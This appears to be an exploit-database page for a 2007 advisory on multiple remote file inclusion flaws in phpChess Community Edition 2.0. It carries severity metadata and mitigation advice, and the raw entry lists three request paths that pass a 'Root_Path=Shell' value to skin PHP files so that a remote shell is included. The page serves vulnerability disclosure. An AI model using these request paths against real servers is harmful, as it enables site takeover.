header-logo
Suggest Exploit
vendor:
phpChess Community Edition
by:
GolD_M = [Mahmood_ali]
7.5
CVSS
HIGH
Multiple Remote File Inclusion
CWE
Product Name: phpChess Community Edition
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

phpChess Community Edition 2.0 Multiple Remote File Inclusion Vulnerabilities

Remote file inclusion vulnerabilities have been discovered in phpChess Community Edition 2.0. The vulnerabilities can be exploited by an attacker by including a malicious file through the 'Root_Path' parameter in certain PHP files.

Mitigation:

Update to a patched version of phpChess Community Edition or apply the necessary security patches. Additionally, it is recommended to sanitize user input before including files.
Source

Exploit-DB raw data:

# phpChess Community Edition 2.0 Multiple Remote File Inclusion Vulnerabilities
# D.Script: http://www.phpchess.net/index-3.html
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/skins/phpchess/layout_admin_cfg.php?Root_Path=Shell
# Exploit:[Path]/skins/phpchess/layout_cfg.php?Root_Path=Shell
# Exploit:[Path]/skins/phpchess/layout_t_top.php?Root_Path=Shell
# Greetz To: Tryag-Team .....##

# milw0rm.com [2007-05-03]